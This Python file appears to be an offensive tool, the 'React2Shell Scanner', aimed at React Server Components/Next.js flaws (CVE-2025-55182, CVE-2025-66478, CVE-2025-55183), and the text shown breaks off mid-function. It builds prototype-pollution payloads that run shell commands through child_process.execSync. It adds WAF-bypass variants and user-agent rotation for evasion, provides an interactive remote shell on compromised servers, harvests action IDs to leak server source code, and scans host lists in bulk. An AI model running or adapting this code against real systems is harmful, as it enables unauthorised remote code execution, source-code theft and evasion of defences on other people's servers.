|
import argparse |
|
import sys |
|
import json |
|
import os |
|
import random |
|
import re |
|
import string |
|
import csv |
|
import time |
|
from datetime import datetime, timezone |
|
from concurrent.futures import ThreadPoolExecutor, as_completed |
|
from urllib.parse import urlparse |
|
from typing import Optional, Tuple |
|
|
|
try: |
|
import requests |
|
from requests.exceptions import RequestException |
|
import urllib3 |
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
|
except ImportError: |
|
print("Error: 'requests' library required. Install with: pip install requests") |
|
sys.exit(1) |
|
|
|
try: |
|
from rich.console import Console |
|
from rich.table import Table |
|
from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn, TaskProgressColumn |
|
from rich.theme import Theme |
|
except ImportError: |
|
print("Error: 'rich' library required. Install with: pip install rich") |
|
sys.exit(1) |
|
|
|
custom_theme = Theme({ |
|
"info": "cyan", |
|
"warning": "yellow", |
|
"error": "red", |
|
"success": "green", |
|
"vuln": "bold red", |
|
"safe": "green", |
|
}) |
|
console = Console(theme=custom_theme) |
|
|
|
class Colors: |
|
RED = "\033[91m" |
|
GREEN = "\033[92m" |
|
YELLOW = "\033[93m" |
|
BLUE = "\033[94m" |
|
MAGENTA = "\033[95m" |
|
CYAN = "\033[96m" |
|
WHITE = "\033[97m" |
|
BOLD = "\033[1m" |
|
RESET = "\033[0m" |
|
|
|
USER_AGENTS = [ |
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", |
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", |
|
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", |
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/121.0", |
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/121.0", |
|
"Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/121.0", |
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", |
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" |
|
] |
|
|
|
def colorize(text: str, color: str) -> str: |
|
|
|
if color == Colors.RED: return f"[red]{text}[/red]" |
|
if color == Colors.GREEN: return f"[green]{text}[/green]" |
|
if color == Colors.YELLOW: return f"[yellow]{text}[/yellow]" |
|
if color == Colors.BLUE: return f"[blue]{text}[/blue]" |
|
if color == Colors.MAGENTA: return f"[magenta]{text}[/magenta]" |
|
if color == Colors.CYAN: return f"[cyan]{text}[/cyan]" |
|
if color == Colors.WHITE: return f"[white]{text}[/white]" |
|
if color == Colors.BOLD: return f"[bold]{text}[/bold]" |
|
return text |
|
|
|
def print_banner(): |
|
banner = "React2Shell Scanner - CVE-2025-55182/CVE-2025-66478" |
|
console.print(banner, style="bold cyan") |
|
|
|
def parse_headers(header_list): |
|
headers = {} |
|
if not header_list: |
|
return headers |
|
for header in header_list: |
|
if ": " in header: |
|
key, value = header.split(": ", 1) |
|
headers[key] = value |
|
elif ":" in header: |
|
key, value = header.split(":", 1) |
|
headers[key] = value.lstrip() |
|
return headers |
|
|
|
def normalize_host(host): |
|
host = host.strip() |
|
if not host: |
|
return "" |
|
if not host.startswith(("http://", "https://")): |
|
host = f"https://{host}" |
|
return host.rstrip("/") |
|
|
|
def generate_junk_data(size_bytes): |
|
param_name = ''.join(random.choices(string.ascii_lowercase, k=12)) |
|
junk = ''.join(random.choices(string.ascii_letters + string.digits, k=size_bytes)) |
|
return param_name, junk |
|
|
|
def build_safe_payload(): |
|
boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad" |
|
|
|
body = ( |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="1"\r\n\r\n' |
|
f"{{}}\r\n" |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="0"\r\n\r\n' |
|
f'["$1:aa:aa"]\r\n' |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--" |
|
) |
|
|
|
content_type = f"multipart/form-data; boundary={boundary}" |
|
return body, content_type |
|
|
|
import waf_bypass_poc |
|
|
|
def build_vercel_waf_bypass_payload(variant=None): |
|
|
|
extra_headers = {} |
|
|
|
if variant: |
|
try: |
|
result = waf_bypass_poc.get_bypass_payload(variant) |
|
|
|
if len(result) == 3: |
|
body, content_type, extra_headers = result |
|
return body, content_type, extra_headers |
|
else: |
|
body, content_type = result |
|
return body, content_type, {} |
|
except ValueError as e: |
|
console.print(f"[warning] Invalid variant {variant}: {e}. Falling back to default payload.[/warning]") |
|
|
|
boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad" |
|
|
|
part0 = ( |
|
'{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,' |
|
'"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":' |
|
'"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;' |
|
'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",' |
|
'"_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}' |
|
) |
|
|
|
body = ( |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="0"\r\n\r\n' |
|
f"{part0}\r\n" |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="1"\r\n\r\n' |
|
f'"$@0"\r\n' |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="2"\r\n\r\n' |
|
f"[]\r\n" |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="3"\r\n\r\n' |
|
f'{{"\\"\u0024\u0024":{{}}}}\r\n' |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--" |
|
) |
|
|
|
content_type = f"multipart/form-data; boundary={boundary}" |
|
return body, content_type, {} |
|
|
|
def build_rce_payload(windows=False, waf_bypass=False, waf_bypass_size_kb=128): |
|
return build_exploit_payload('41*271', windows, waf_bypass, waf_bypass_size_kb, is_custom_cmd=False) |
|
|
|
def build_exploit_payload(cmd, windows=False, waf_bypass=False, waf_bypass_size_kb=128, is_custom_cmd=True): |
|
boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad" |
|
|
|
if windows and not is_custom_cmd: |
|
|
|
cmd = 'powershell -c \\"41*271\\"' |
|
elif is_custom_cmd: |
|
if windows: |
|
pass |
|
else: |
|
pass |
|
else: |
|
cmd = 'echo $((41*271))' |
|
|
|
cmd_escaped = cmd.replace("'", "\\'") |
|
|
|
prefix_payload = ( |
|
f"var res=process.mainModule.require('child_process').execSync('{cmd_escaped}',{{'timeout':5000}}).toString('base64');" |
|
f"throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`NEXT_REDIRECT;push;/login?a=${{res}};307;`}});" |
|
) |
|
|
|
part0 = ( |
|
'{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,' |
|
'"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"' |
|
+ prefix_payload |
|
+ '","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}' |
|
) |
|
|
|
parts = [] |
|
|
|
if waf_bypass: |
|
param_name, junk = generate_junk_data(waf_bypass_size_kb * 1024) |
|
parts.append( |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="{param_name}"\r\n\r\n' |
|
f"{junk}\r\n" |
|
) |
|
|
|
parts.append( |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="0"\r\n\r\n' |
|
f"{part0}\r\n" |
|
) |
|
parts.append( |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="1"\r\n\r\n' |
|
f'"$@0"\r\n' |
|
) |
|
parts.append( |
|
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" |
|
f'Content-Disposition: form-data; name="2"\r\n\r\n' |
|
f"[]\r\n" |
|
) |
|
parts.append("------WebKitFormBoundaryx8jO2oVc6SWP3Sad--") |
|
|
|
body = "".join(parts) |
|
content_type = f"multipart/form-data; boundary={boundary}" |
|
return body, content_type |
|
|
|
def resolve_redirects(url, timeout, verify_ssl, proxies=None, max_redirects=5): |
|
current_url = url |
|
original_host = urlparse(url).netloc |
|
|
|
for _ in range(max_redirects): |
|
try: |
|
response = requests.head( |
|
current_url, |
|
timeout=timeout, |
|
verify=verify_ssl, |
|
allow_redirects=False, |
|
proxies=proxies |
|
) |
|
if response.status_code in (301, 302, 303, 307, 308): |
|
location = response.headers.get("Location") |
|
if location: |
|
if location.startswith("/"): |
|
|
|
parsed = urlparse(current_url) |
|
current_url = f"{parsed.scheme}://{parsed.netloc}{location}" |
|
else: |
|
|
|
new_host = urlparse(location).netloc |
|
if new_host == original_host: |
|
current_url = location |
|
else: |
|
break |
|
else: |
|
break |
|
else: |
|
break |
|
except RequestException: |
|
break |
|
return current_url |
|
|
|
def send_payload(target_url, headers, body, timeout, verify_ssl, proxies=None): |
|
try: |
|
|
|
body_bytes = body.encode('utf-8') if isinstance(body, str) else body |
|
response = requests.post( |
|
target_url, |
|
headers=headers, |
|
data=body_bytes, |
|
timeout=timeout, |
|
verify=verify_ssl, |
|
allow_redirects=False, |
|
proxies=proxies |
|
) |
|
return response, None |
|
except requests.exceptions.SSLError as e: |
|
return None, f"SSL Error: {str(e)}" |
|
except requests.exceptions.ConnectionError as e: |
|
return None, f"Connection Error: {str(e)}" |
|
except requests.exceptions.Timeout: |
|
return None, "Request timed out" |
|
except RequestException as e: |
|
return None, f"Request failed: {str(e)}" |
|
except Exception as e: |
|
return None, f"Unexpected error: {str(e)}" |
|
|
|
def interactive_shell(url, timeout, verify_ssl, proxies=None, windows=False, waf_bypass=False, waf_bypass_size_kb=128, custom_headers=None, random_agent=False, vercel_waf_bypass=False, bypass_variant=None): |
|
|
|
parsed_url = urlparse(url) |
|
target_host = parsed_url.netloc |
|
|
|
console.print(f"[*] Starting interactive shell on {url}", style="info") |
|
if vercel_waf_bypass and bypass_variant: |
|
console.print(f"[*] Using WAF Bypass Variant: {bypass_variant}", style="info") |
|
|
|
console.print("[*] Type 'exit' or 'quit' to stop", style="info") |
|
|
|
headers = { |
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0", |
|
"Next-Action": "007138e0bfbdd7fe024391a1251fd5861f0b5145dc", |
|
"X-Nextjs-Request-Id": "b5dce965", |
|
"X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9", |
|
} |
|
|
|
if random_agent: |
|
headers["User-Agent"] = random.choice(USER_AGENTS) |
|
|
|
if custom_headers: |
|
headers.update(custom_headers) |
|
|
|
session = requests.Session() |
|
session.verify = verify_ssl |
|
session.proxies = proxies |
|
|
|
target_url = url |
|
|
|
while True: |
|
try: |
|
cmd = input(f"{Colors.BLUE}Shell>{Colors.RESET} ").strip() |
|
if cmd.lower() in ['exit', 'quit']: |
|
break |
|
if not cmd: |
|
continue |
|
|
|
if vercel_waf_bypass and bypass_variant: |
|
try: |
|
cmd_escaped = cmd.replace("'", "\\'") |
|
js_code = ( |
|
f"var res = process.mainModule.require('child_process').execSync('{cmd_escaped}',{{'timeout':5000}}).toString('base64');" |
|
f"throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`NEXT_REDIRECT;push;/login?a=${{res}};307;`}});" |
|
) |
|
|
|
import waf_bypass_poc |
|
|
|
result = waf_bypass_poc.get_bypass_payload(int(bypass_variant), js_code=js_code) |
|
|
|
if len(result) == 3: |
|
body, content_type, extra_headers_variant = result |
|
headers.update(extra_headers_variant) |
|
else: |
|
body, content_type = result |
|
|
|
headers["Content-Type"] = content_type |
|
except Exception as e: |
|
console.print(f"[!] Error generating variant payload: {e}. Falling back to standard.", style="warning") |
|
body, content_type = build_exploit_payload(cmd, windows, waf_bypass, waf_bypass_size_kb, is_custom_cmd=True) |
|
headers["Content-Type"] = content_type |
|
|
|
else: |
|
body, content_type = build_exploit_payload(cmd, windows, waf_bypass, waf_bypass_size_kb, is_custom_cmd=True) |
|
headers["Content-Type"] = content_type |
|
|
|
try: |
|
|
|
body_bytes = body.encode('utf-8') if isinstance(body, str) else body |
|
|
|
response = session.post( |
|
target_url, |
|
headers=headers, |
|
data=body_bytes, |
|
timeout=timeout, |
|
allow_redirects=False |
|
) |
|
|
|
redirect_header = response.headers.get("X-Action-Redirect", "") |
|
if response.status_code == 500 and 'E{"digest":' in response.text: |
|
try: |
|
match = re.search(r'E\{"digest":"(.*?)"\}', response.text, re.DOTALL) |
|
if match: |
|
output = match.group(1) |
|
output = output.replace('\\n', '\n').replace('\\"', '"').replace('\\\\', '\\') |
|
console.print(output) |
|
else: |
|
console.print("[-] Output pattern not found in response", style="warning") |
|
except Exception as e: |
|
console.print(f"[-] Error extracting output: {e}", style="warning") |
|
|
|
else: |
|
candidates = [ |
|
redirect_header, |
|
response.headers.get("Location", "") |
|
] |
|
|
|
found = False |
|
for source in candidates: |
|
if not source: continue |
|
match = re.search(r'login\?a=(.*?)(?:;|$)', source) |
|
if match: |
|
try: |
|
import base64 |
|
from urllib.parse import unquote |
|
output_b64 = match.group(1) |
|
decoded = base64.b64decode(unquote(output_b64)).decode('utf-8', errors='ignore') |
|
console.print(decoded) |
|
found = True |
|
break |
|
except Exception as e: |
|
console.print(f"[-] Failed to decode output: {e}", style="warning") |
|
|
|
if not found: |
|
console.print(f"[-] No output received (Status: {response.status_code})", style="warning") |
|
|
|
except KeyboardInterrupt: |
|
break |
|
except Exception as e: |
|
|
|
console.print(f"[!] Error sending command: {e}", style="error") |
|
|
|
except KeyboardInterrupt: |
|
break |
|
|
|
console.print("\n[*] Exiting shell", style="info") |
|
|
|
def is_vulnerable_safe_check(response): |
|
if response.status_code != 500 or 'E{"digest"' not in response.text: |
|
return False |
|
|
|
server_header = response.headers.get("Server", "").lower() |
|
has_netlify_vary = "Netlify-Vary" in response.headers |
|
is_mitigated = ( |
|
has_netlify_vary |
|
or server_header == "netlify" |
|
or server_header == "vercel" |
|
) |
|
|
|
return not is_mitigated |
|
|
|
def is_vulnerable_rce_check(response): |
|
|
|
redirect_header = response.headers.get("X-Action-Redirect", "") |
|
if redirect_header: |
|
match = re.search(r'.*/login\?a=(.*?)(?:;|$)', redirect_header) |
|
if match: |
|
try: |
|
import base64 |
|
from urllib.parse import unquote |
|
output_b64 = match.group(1) |
|
decoded = base64.b64decode(unquote(output_b64)).decode('utf-8', errors='ignore') |
|
if "11111" in decoded: |
|
return "VULNERABLE" |
|
except Exception: |
|
pass |
|
|
|
if response.status_code == 500: |
|
|
|
if "digest" in response.text or '1:E' in response.text: |
|
if "3000801989" in response.text: |
|
return "NOT_VULNERABLE_DIGEST" |
|
return "POTENTIAL_BYPASS" |
|
|
|
if "Application error" in response.text: |
|
return "POTENTIAL_BYPASS" |
|
|
|
return "NO_RCE" |
|
|
|
def check_vulnerability(host, timeout, verify_ssl, custom_headers=None, safe_check=False, windows=False, waf_bypass=False, waf_bypass_size_kb=128, vercel_waf_bypass=False, bypass_variant=None, paths=None, proxies=None, delay=0, random_agent=False, follow_redirects=True): |
|
if delay > 0: |
|
time.sleep(delay) |
|
|
|
result = { |
|
"host": host, |
|
"vulnerable": None, |
|
"status_code": None, |
|
"error": None, |
|
"request": None, |
|
"response": None, |
|
"final_url": None, |
|
"tested_url": None, |
|
"timestamp": datetime.now(timezone.utc).isoformat() + "Z" |
|
} |
|
|
|
host = normalize_host(host) |
|
if not host: |
|
result["error"] = "Invalid or empty host" |
|
return result |
|
|
|
if paths: |
|
test_paths = paths |
|
else: |
|
test_paths = ["/"] |
|
|
|
if safe_check: |
|
body, content_type = build_safe_payload() |
|
extra_headers_from_payload = {} |
|
is_vulnerable = is_vulnerable_safe_check |
|
elif vercel_waf_bypass: |
|
payload_result = build_vercel_waf_bypass_payload(variant=bypass_variant) |
|
body, content_type = payload_result[0], payload_result[1] |
|
extra_headers_from_payload = payload_result[2] if len(payload_result) > 2 else {} |
|
is_vulnerable = is_vulnerable_rce_check |
|
else: |
|
body, content_type = build_rce_payload(windows=windows, waf_bypass=waf_bypass, waf_bypass_size_kb=waf_bypass_size_kb) |
|
extra_headers_from_payload = {} |
|
is_vulnerable = is_vulnerable_rce_check |
|
|
|
headers = { |
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0", |
|
"Next-Action": "007138e0bfbdd7fe024391a1251fd5861f0b5145dc", |
|
"X-Nextjs-Request-Id": "b5dce965", |
|
"Content-Type": content_type, |
|
"X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9", |
|
} |
|
|
|
gzip_variants = [24, 26, 27, 28, 29, 30, 31, 43, 47, 51, 52, 53, 54, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 75, 86, 91, 92, 93, 94, 95, 96, 97, 98, 102] |
|
if bypass_variant in gzip_variants: |
|
headers["Content-Encoding"] = "gzip" |
|
elif bypass_variant == 25 or bypass_variant == 44: |
|
headers["Content-Encoding"] = "deflate" |
|
|
|
if bypass_variant in [39, 40, 90]: |
|
headers["Transfer-Encoding"] = "chunked" |
|
|
|
if bypass_variant == 40: |
|
headers["Content-Length"] = str(len(body)) |
|
|
|
if vercel_waf_bypass and extra_headers_from_payload: |
|
headers.update(extra_headers_from_payload) |
|
|
|
if random_agent: |
|
headers["User-Agent"] = random.choice(USER_AGENTS) |
|
|
|
if custom_headers: |
|
headers.update(custom_headers) |
|
|
|
def build_request_str(url: str) -> str: |
|
parsed = urlparse(url) |
|
req_str = f"POST {'/aaa' or '/aaa'} HTTP/1.1\r\n" |
|
req_str += f"Host: {parsed.netloc}\r\n" |
|
for k, v in headers.items(): |
|
req_str += f"{k}: {v}\r\n" |
|
|
|
body_len = len(body) if hasattr(body, '__len__') else 0 |
|
req_str += f"Content-Length: {body_len}\r\n\r\n" |
|
|
|
if isinstance(body, bytes): |
|
req_str += "<binary data>" |
|
else: |
|
req_str += body |
|
return req_str |
|
|
|
def build_response_str(resp: requests.Response) -> str: |
|
resp_str = f"HTTP/1.1 {resp.status_code} {resp.reason}\r\n" |
|
for k, v in resp.headers.items(): |
|
resp_str += f"{k}: {v}\r\n" |
|
resp_str += f"\r\n{resp.text[:5000]}" |
|
return resp_str |
|
|
|
for idx, path in enumerate(test_paths): |
|
|
|
if not path.startswith("/"): |
|
path = "/" + path |
|
|
|
test_url = f"{host}{path}" |
|
|
|
result["tested_url"] = test_url |
|
result["final_url"] = test_url |
|
result["request"] = build_request_str(test_url) |
|
|
|
response, error = send_payload(test_url, headers, body, timeout, verify_ssl, proxies) |
|
|
|
if error: |
|
|
|
if not safe_check and error == "Request timed out": |
|
result["vulnerable"] = False |
|
result["error"] = error |
|
|
|
if idx < len(test_paths) - 1: |
|
continue |
|
return result |
|
|
|
if idx < len(test_paths) - 1: |
|
continue |
|
result["error"] = error |
|
return result |
|
|
|
elapsed_time = response.elapsed.total_seconds() |
|
console.print(f"[DEBUG] Elapsed: {elapsed_time:.2f}s (Variant: {bypass_variant})") |
|
|
|
if bypass_variant == 52 and elapsed_time > 2.5: |
|
result["vulnerable"] = True |
|
result["status_code"] = response.status_code |
|
result["response"] = f"Response Time: {elapsed_time}s\n" + response.text[:500] |
|
console.print(f"[bold red][VULNERABLE] {host} - RCE Confirmed via Timing (Variant 52, {elapsed_time:.2f}s)![/bold red]") |
|
return result |
|
|
|
result["status_code"] = response.status_code |
|
result["response"] = build_response_str(response) |
|
|
|
vuln_status = is_vulnerable(response) |
|
|
|
if isinstance(vuln_status, str): |
|
if vuln_status == "VULNERABLE": |
|
result["vulnerable"] = True |
|
result["status_code"] = response.status_code |
|
result["response"] = response.text[:500] |
|
|
|
console.print(f"[bold red][VULNERABLE] {host} - RCE Confirmed![/bold red]") |
|
|
|
|
|
console.print("\n[bold yellow]=== HTTP Request ===[/bold yellow]") |
|
req = response.request |
|
console.print(f"[bold]{req.method} {req.url}[/bold]") |
|
for k, v in req.headers.items(): |
|
console.print(f"{k}: {v}") |
|
if req.body: |
|
console.print("\n[dim]Body:[/dim]") |
|
console.print(f"{req.body!r}") |
|
|
|
console.print("\n[bold green]=== HTTP Response ===[/bold green]") |
|
console.print(f"[bold]Status: {response.status_code}[/bold]") |
|
for k, v in response.headers.items(): |
|
console.print(f"{k}: {v}") |
|
console.print("\n[dim]Body:[/dim]") |
|
console.print(f"{response.text}") |
|
|
|
return result |
|
elif vuln_status == "POTENTIAL_BYPASS": |
|
result["vulnerable"] = False |
|
result["potential_bypass"] = True |
|
result["error"] = "Potential WAF Bypass (Server Error)" |
|
result["status_code"] = response.status_code |
|
result["response"] = response.text[:200] |
|
|
|
console.print(f"[yellow][POTENTIAL BYPASS] {host} - Status: {response.status_code}[/yellow]") |
|
elif vuln_status == "NOT_VULNERABLE_DIGEST": |
|
result["vulnerable"] = False |
|
result["potential_bypass"] = False |
|
result["status_code"] = response.status_code |
|
console.print(f"[green][NOT VULNERABLE] {host} - Status: {response.status_code} (Known Digest)[/green]") |
|
elif vuln_status == "NO_RCE": |
|
|
|
if response.status_code == 500: |
|
result["vulnerable"] = False |
|
result["potential_bypass"] = True |
|
result["error"] = "Potential WAF Bypass (Server Error)" |
|
result["status_code"] = response.status_code |
|
console.print(f"[yellow][POTENTIAL BYPASS] {host} - Status: {response.status_code}[/yellow]") |
|
else: |
|
result["vulnerable"] = False |
|
result["status_code"] = response.status_code |
|
console.print(f"[green][NOT VULNERABLE] {host} - Status: {response.status_code}[/green]") |
|
else: |
|
|
|
result["vulnerable"] = False |
|
result["status_code"] = response.status_code |
|
console.print(f"[green][NOT VULNERABLE] {host} - Status: {response.status_code}[/green]") |
|
elif vuln_status: |
|
result["vulnerable"] = True |
|
return result |
|
|
|
if follow_redirects: |
|
try: |
|
redirect_url = resolve_redirects(test_url, timeout, verify_ssl, proxies=proxies) |
|
if redirect_url != test_url: |
|
|
|
response, error = send_payload(redirect_url, headers, body, timeout, verify_ssl, proxies) |
|
|
|
if error: |
|
continue |
|
|
|
result["final_url"] = redirect_url |
|
result["request"] = build_request_str(redirect_url) |
|
result["status_code"] = response.status_code |
|
result["response"] = build_response_str(response) |
|
|
|
vuln_status = is_vulnerable(response) |
|
if isinstance(vuln_status, str): |
|
if vuln_status == "VULNERABLE": |
|
result["vulnerable"] = True |
|
return result |
|
elif vuln_status: |
|
result["vulnerable"] = True |
|
return result |
|
except Exception: |
|
pass |
|
|
|
result["vulnerable"] = False |
|
return result |
|
|
|
def check_cve_2025_55183(host, timeout, verify_ssl, proxies=None, custom_headers=None, random_agent=False): |
|
host = normalize_host(host) |
|
console.print(f"[*] Scanning {host} for CVE-2025-55183 (RSC Source Code Disclosure)...", style="info") |
|
|
|
session = requests.Session() |
|
session.verify = verify_ssl |
|
session.proxies = proxies |
|
|
|
base_headers = { |
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" |
|
} |
|
if random_agent: |
|
base_headers["User-Agent"] = random.choice(USER_AGENTS) |
|
if custom_headers: |
|
base_headers.update(custom_headers) |
|
|
|
try: |
|
resp = session.get(host, headers=base_headers, timeout=timeout) |
|
except RequestException as e: |
|
console.print(f"[-] Failed to fetch base URL: {e}", style="error") |
|
return |
|
|
|
chunk_paths = re.findall(r'/_next/static/chunks/[^"\' >\s\\]+\.js', resp.text) |
|
chunk_paths = list(set(chunk_paths)) |
|
|
|
if not chunk_paths: |
|
console.print(f"[-] No chunk files found on {host} (Response len: {len(resp.text)})", style="warning") |
|
return |
|
|
|
console.print(f"[*] Found {len(chunk_paths)} chunks", style="info") |
|
|
|
action_ids = set() |
|
|
|
console.print("[*] Scanning main page for Action IDs...", style="info") |
|
|
|
found_in_html = re.findall(r'([a-f0-9]{40,42})', resp.text) |
|
if found_in_html: |
|
unique_html_ids = set(found_in_html) |
|
action_ids.update(unique_html_ids) |
|
console.print(f"[*] Found {len(unique_html_ids)} Action IDs in HTML", style="info") |
|
|
|
with Progress( |
|
SpinnerColumn(), |
|
TextColumn("[progress.description]{task.description}"), |
|
BarColumn(), |
|
TaskProgressColumn(), |
|
console=console, |
|
transient=True |
|
) as progress: |
|
task = progress.add_task("[cyan]Scanning chunks...", total=len(chunk_paths)) |
|
|
|
for path in chunk_paths: |
|
try: |
|
chunk_url = f"{host}{path}" if path.startswith('/') else f"{host}/{path}" |
|
c_resp = session.get(chunk_url, headers=base_headers, timeout=timeout) |
|
|
|
found = re.findall(r'"([a-f0-9]{40,42})"', c_resp.text) |
|
action_ids.update(found) |
|
except Exception: |
|
pass |
|
progress.update(task, advance=1) |
|
|
|
if not action_ids: |
|
console.print(f"[-] No server action IDs found in chunks for {host}", style="warning") |
|
return |
|
|
|
console.print(f"[*] Found {len(action_ids)} Action IDs. Testing for source leak...", style="info") |
|
|
|
chunk_found = False |
|
|
|
with Progress( |
|
SpinnerColumn(), |
|
TextColumn("[progress.description]{task.description}"), |
|
BarColumn(), |
|
TaskProgressColumn(), |
|
console=console, |
|
transient=True |
|
) as progress: |
|
task = progress.add_task("[cyan]Exploiting actions...", total=len(action_ids)) |
|
|
|
for action_id in action_ids: |
|
boundary = "----SourceLeak" |
|
payload = ( |
|
f"------SourceLeak\r\n" |
|
f'Content-Disposition: form-data; name="0"\r\n\r\n' |
|
f'["$F1"]\r\n' |
|
f"------SourceLeak\r\n" |
|
f'Content-Disposition: form-data; name="1"\r\n\r\n' |
|
f'{{"id":"{action_id}","bound":null}}\r\n' |
|
f"------SourceLeak--\r\n" |
|
) |
|
|
|
test_headers = base_headers.copy() |
|
test_headers.update({ |
|
"Accept": "text/x-component", |
|
"Content-Type": f"multipart/form-data; boundary={boundary}", |
|
"Next-Action": action_id |
|
}) |
|
|
|
try: |
|
p_resp = session.post(host, data=payload, headers=test_headers, timeout=timeout) |
|
|
|
if "text/x-component" in p_resp.headers.get("Content-Type", ""): |
|
if "function" in p_resp.text: |
|
|
|
if "function () { [omitted code] }" not in p_resp.text: |
|
|
|
match = re.search(r'function [a-zA-Z_][a-zA-Z0-9_]*\([^)]*\)[^}]+\}', p_resp.text) |
|
if match: |
|
console.print(f"[bold red][VULNERABLE] {host} - Source Code Disclosure (Action: {action_id})[/bold red]") |
|
snippet = match.group(0) |
|
if len(snippet) > 500: |
|
snippet = snippet[:500] + "..." |
|
console.print(f"[cyan]Leaked Source Snippet:[/cyan]\n{snippet}") |
|
chunk_found = True |
|
except Exception: |
|
pass |
|
|
|
progress.update(task, advance=1) |
|
|
|
if not chunk_found: |
|
console.print(f"[green][NOT VULNERABLE] {host} - No source code leaked[/green]") |
|
|
|
def load_hosts(hosts_file): |
|
hosts = [] |
|
try: |
|
with open(hosts_file, "r") as f: |
|
for line in f: |
|
host = line.strip() |
|
if host and not host.startswith("#"): |
|
hosts.append(host) |
|
except FileNotFoundError: |
|
console.print(f"[ERROR] File not found: {hosts_file}", style="error") |
|
sys.exit(1) |
|
except Exception as e: |
|
console.print(f"[ERROR] Failed to read file: {e}", style="error") |
|
sys.exit(1) |
|
return hosts |
|
|
|
def load_paths(paths_file): |
|
paths = [] |
|
try: |
|
with open(paths_file, "r") as f: |
|
for line in f: |
|
path = line.strip() |
|
if path and not path.startswith("#"): |
|
|
|
if not path.startswith("/"): |
|
path = "/" + path |
|
paths.append(path) |
|
except FileNotFoundError: |
|
console.print(f"[ERROR] File not found: {paths_file}", style="error") |
|
sys.exit(1) |
|
except Exception as e: |
|
console.print(f"[ERROR] Failed to read file: {e}", style="error") |
|
sys.exit(1) |
|
return paths |
|
|
|
def save_results(results: list[dict], output_file: str, file_format: str = "json", vulnerable_only: bool = True): |
|
if vulnerable_only: |
|
results = [r for r in results if r.get("vulnerable") is True] |
|
|
|
if file_format == "json": |
|
output = { |
|
"scan_time": datetime.now(timezone.utc).isoformat() + "Z", |
|
"total_results": len(results), |
|
"results": results |
|
} |
|
try: |
|
with open(output_file, "w") as f: |
|
json.dump(output, f, indent=2) |
|
console.print(f"\n[+] Results saved to: {output_file}", style="success") |
|
except Exception as e: |
|
console.print(f"\n[ERROR] Failed to save results: {e}", style="error") |
|
|
|
elif file_format == "csv": |
|
keys = ["timestamp", "host", "vulnerable", "status_code", "final_url", "error"] |
|
try: |
|
with open(output_file, "w", newline='') as f: |
|
writer = csv.DictWriter(f, fieldnames=keys) |
|
writer.writeheader() |
|
for r in results: |
|
writer.writerow({k: r.get(k) for k in keys}) |
|
console.print(f"\n[+] Results saved to: {output_file}", style="success") |
|
except Exception as e: |
|
console.print(f"\n[ERROR] Failed to save results: {e}", style="error") |
|
|
|
elif file_format == "html": |
|
try: |
|
